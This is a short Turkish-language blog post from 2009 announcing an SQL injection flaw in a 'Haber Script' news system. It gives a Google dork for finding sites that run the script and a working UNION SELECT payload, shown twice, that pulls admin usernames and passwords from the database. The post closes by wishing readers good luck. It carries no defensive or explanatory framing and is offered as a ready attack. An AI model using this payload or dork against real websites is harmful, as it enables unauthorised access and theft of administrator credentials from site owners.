10 Aralık 2009 Perşembe

Haber Script SQL injection..

Acıgı Bulan : ByEge

Acık Türü : SQL İNJECTİON

Script Türü : Haber Script


Google Dork : cikti.php?mode=news


Site sonuna eklenen İnj kod.: cikti.php?mode=news&id=-3210 UNION SELECT group_concat(username,0x3a,password),2,3,4,5 from admin


http://localhost/cikti.php?mode=news&id=-3210 UNION SELECT group_concat(username,0x3a,password),2,3,4,5 from admin


Kolay gelsin

Hiç yorum yok :

Yorum Gönderme